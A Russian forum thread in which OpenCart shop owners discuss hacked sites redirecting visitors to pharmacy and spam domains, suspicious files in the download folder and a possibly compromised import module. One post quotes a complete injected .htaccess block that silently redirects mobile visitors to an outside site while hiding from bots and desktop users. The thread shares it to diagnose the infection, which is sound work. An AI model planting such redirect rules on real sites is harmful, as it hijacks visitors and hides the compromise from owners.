Появилась переадресация на mysafemedz.com, что это?

[vector]

Добрый день! Подскажите, откуда появилась переадресация на какой-то непонятный сайт mysafemedz. com

из вместо ссылок на страницы:

1). О нас

2). Информация о доставке

3). Условия соглашения

4). Наши партнёры

5). Как нас найти

Все эти страницы создаются в разделе Каталог->Статьи

Пытался переименовать ссылки в админке на эти страницы, но история таже. Или на сайт или ошибка 502 Bad Gateway.

[Tom]

Вирус однако! :ph34r:

[vector]

Где именно вирус? На хосте или у меня?

[Tom]

Пойду заварю коффейку покрепче! Ну а иначе как ещё Вам дать точный ответ,как не по кофейной гуще гадая.

[Tom]

Загляните в свой  htacsess   ,скорей всего вирус переписал его.

[krskalex]

одновременно было взломано куча сайтов, на разных хостингах...

у многих было перенаправление на этот сайт mysafemedz. com

у меня тоже дня 3-4 назад..

 

был изменен файл htacsess

и в папке dawnoad была куча файлов всяких разных.

 

заменил пароли все, файлы удалил,

файл htacсess изменил на новый.

 

Сегодня хостер отключил сайты. Говорит спамят....((

 

что делать, где искать..?

айболитом сайт проверял - показывал вредоносный файл где то здесь

php excel - не знаю что с ним не так и где искать..

теперь айболит не работает (((

Хостер не включит сайт пока все проблемы не решу..

[polopokop]

У меня такая же беда. Ко всему вышесказанному добавлю еще, что в админке в Загрузках лежит файл info.php3.9ff4d3f2cd9c13d89382e0475b291494. Нужно копаться в файлах загруженных в папку download. К сожалению я ее случайно удалил.

[krskalex]

Вот еще админ хостера прислал:

/docs/system/PHPExcel/Classes/PHPExcel

 

как я и говорил - айболит показывал тоже самое,

это модуль эксель импрот экспрот - только какой не помню - найду напишу.

 

Копец модули получается качать тоже нельзя? )) я их только с этого сайта беру...

[krskalex]

Вот файл что качал и устанваливал:

 

export-import-xls-OCSTORE - 1.5.4.1

 

ссылка https://opencartforum.com/files/file/687-eksport-import-export-import-xls-dlia-ocstore-1541/

 

получается либо файл изначально с кодом,

либо в нем уязвимость и потом код там появляется?

[polopokop]

Похоже, что эпидемия!!

На другом моем сайта, у другого хостера ocstore 1.5.4.1 в папке download

файл 404.php.393f651a5afbd676aa7e4202d08ea292. Прикрепляю.

А в .htaccess добавлено:

#########rataman##########
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !wpc_nr [NC]
RewriteCond %{HTTP_USER_AGENT} !(iphone|ipad|ipod|iphone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://skriptogram.ru/?i=2043&l=1 [L,R=302]
#########!rataman!#########

Проверил остальные свои сайты. Пока чистые.

[OldAine]

Пойду заварю коффейку покрепче! Ну а иначе как ещё Вам дать точный ответ,как не по кофейной гуще гадая.

У меня было такое поганое настроение, пока я не прочел Ваш комментарий, спасибо  :-D 

[riny]

кто-нибудь нашел решение проблемы? сегодня в руки попал магазин с такой-же проблемой, рассылал спам, в папке download лежали веселые файлики

[Tom]

За эту неделю нашёл по просьбе эту бяку в трёх магазинах.В основном переписывается  htaccsess.

[l.slava]

кто-нибудь нашел решение проблемы? сегодня в руки попал магазин с такой-же проблемой, рассылал спам, в папке download лежали веселые файлики

 

Если вы видите что к вам загрузили скрипты не относящиеся к opencart это говорит о том что вашем сайте есть уязвимость через которую злоумышленник может сделать с вашими файлами все что угодно. И пока уязвимость не будет устранена, вам будут загружать вредоносный код. Самый простой способ не допустить этого проверяйте все файлы которые вы скачиваете с интернета, в частности шаблоны которые были украдены и выложены в свободный доступ, а также различные модули. В данном случае лучше удалить все файлы и заново установить opencart, предварительно скачав картинки и дамп базы данных. Так как уязвимость может быть замаскирована под обычный код и не профессионал вряд ли его обнаружит.

[qwert5005]

Всем привет.

У меня на одном хостинге, два магазина, один тестовый, другой нормальный. У тестового пароль и логин admin. Так вот, захожу сегодня на хостинг, смотрю в корневую директорию, а там куча новых папок, с короткими названиями, типа kuy, lg и тп. В этих папках txt ридми фалы и html файлы, открыл html фаил, он ведет на американский сайт

http://com-nightpost.com/diet/iGreenCoffe/

  рекламирующий добавки и средства для похудания. Тестовый магазин, сегодня быстренько снес.

Самое интересное, что реальный магазин не тронули, ломанули только тестовый. Может потому что у меня там стоял стандартный шаблон Opencart, а в нем описание товаров на английском, амерские хакеры наверно подумали, что это крутой магазин, торгующий электроникой))
Посмотрел, на посетителей, реального инет магазина, было два посетителя, один с Канады, другой с США. Видать и его пытались ломануть, но пароль к админке не смогли подобрать.

Я вот только не пойму, как они магазин ломанули, неужели через админку? Теперь наверно и от хостинга пароль придется менять.

[qwert5005]

Думаю через админку ломанули магазин, а уже через админку и хостинг (если такое возможно конечно)

[afwollis]

admin/admin и вы еще спрашиваете "как?".

издеваетесь?

[Lilya]

А подскажите, вот у меня в папке gownload тоже около 10 файлов с кракозяблами в названии. Мне их удалить? А как восстановить htaccess? У меня таких файла три штуки в разных папках. Что с ними сделать надо?

[afwollis]

для начала надо разобраться, что за файлы.

htaccess - без излишеств можно взять из архива используемой версии движка.

но если добавляли в него правила/настройки - НЕЛЬЗЯ бездумно перезаписывать свой файл оригинальным.

[riny]

А подскажите, вот у меня в папке gownload тоже около 10 файлов с кракозяблами в названии. Мне их удалить?

удаляйте, не удаляйте, через пару дней они там снова будут.

 

А как восстановить htaccess?

с чего вы взяли, что файл изменен?

[Lilya]

Ок. Вот мои три файла htaccess

 

вот, который в VQMOD:

 

# Prevent Directoy listing
Options -Indexes

<FilesMatch "\.(xml|cache)">
Order deny,allow
Deny from all
</FilesMatch>

 

Вот который в html public

(только я там заменила кое-что на ----------, т.к. не знаю, можно ли это выкладывать.)

 

# 1.To use URL Alias you need to be running apache with mod_rewrite enabled.

# 2. In your opencart directory rename htaccess.txt to .htaccess.

# For any support issues please visit: http://www.opencart.com

Options +FollowSymlinks

# Prevent Directoy listing
Options -Indexes

# Prevent Direct Access to files
<FilesMatch "\.(tpl|ini|log)">
Order deny,allow
Deny from all
</FilesMatch>

# SEO URL Settings
RewriteEngine On
# If your opencart installation does not run on the main web folder make sure you folder it does run in ie. / becomes /shop/

RewriteBase /
RewriteRule ^sitem----------------------------------------------------------------------
RewriteRule ^goo------------------------------------------------------------------------
RewriteRule ^dow-----------------------------------------------------------------------
RewriteCond %--------------------------------------------------------------------------
RewriteCond %{------------------------------------------------------------------------
RewriteCond %{------------------------------------------------------------------------
RewriteRule ^([-------------------------------------------------------------------------

### Additional Settings that may need to be enabled for some servers
### Uncomment the commands by removing the # sign in front of it.
### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.

# 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
# php_flag register_globals off

# 2. If your cart has magic quotes enabled, This may work to disable it:
# php_flag magic_quotes_gpc Off

# 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
# php_value upload_max_filesize 999M

# 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value post_max_size 999M

# 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_execution_time 200

# 6. set max time for input to be recieved. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_input_time 200

# 7. disable open_basedir limitations
# php_admin_value open_basedir none

 

А вот, который в /public_html/admin/view/javascript/ckeditor/.htaccess

 

#

# Copyright © 2003-2012, CKSource - Frederico Knabben. All rights reserved.
# For licensing, see LICENSE.html or http://ckeditor.com/license
#

#
# On some specific Linux installations you could face problems with Firefox.
# It could give you errors when loading the editor saying that some illegal
# characters were found (three strange chars in the beginning of the file).
# This could happen if you map the .js or .css files to PHP, for example.
#
# Those characters are the Byte Order Mask (BOM) of the Unicode encoded files.
# All FCKeditor files are Unicode encoded.
#

AddType application/x-javascript .js
AddType text/css .css

#
# If PHP is mapped to handle XML files, you could have some issues. The
# following will disable it.
#

AddType text/xml .xml

 

 

Можете ли вы, уважаемые знатоки, глянуть - они правильные или нет?

Спасибо.

[afwollis]

чистые.

в корне магазина (второй) скрывать нечего - он базовый.

[Lilya]

Я посмотрела на куки, которые создаются при отображении моей страницы, и обнаружила, что записываются куки с эдак так 20 сайтов! Там есть и Алибаба, и Алиэкспресс, и Мегого.ру, и 777...ру и много другого. А еще через "Отображение кода страницы" в браузере я вижу, что при отображении сайта идет обращение только с моему сайту (мое доменное имя) и один раз в стороннему виджету "101виджет".

Правильно ли я понимаю, что надо убрать и этот 101виджет. А далее смотреть: если куки появятся заново - то баг где-то именно в коде сайта, а не на стороне?

Ход правильный?

[deim]

Сторонние куки сайтов могут быть от всяких лайко-шара-твито-кнопочек и счетчиков статистики, которые вы ставили

[Lilya]

Да. Я это понимаю. Поэтому я временно убрала все счетчики, метрику, аналитикс, ВК, кнопочки. Осталось лишь "101виджет".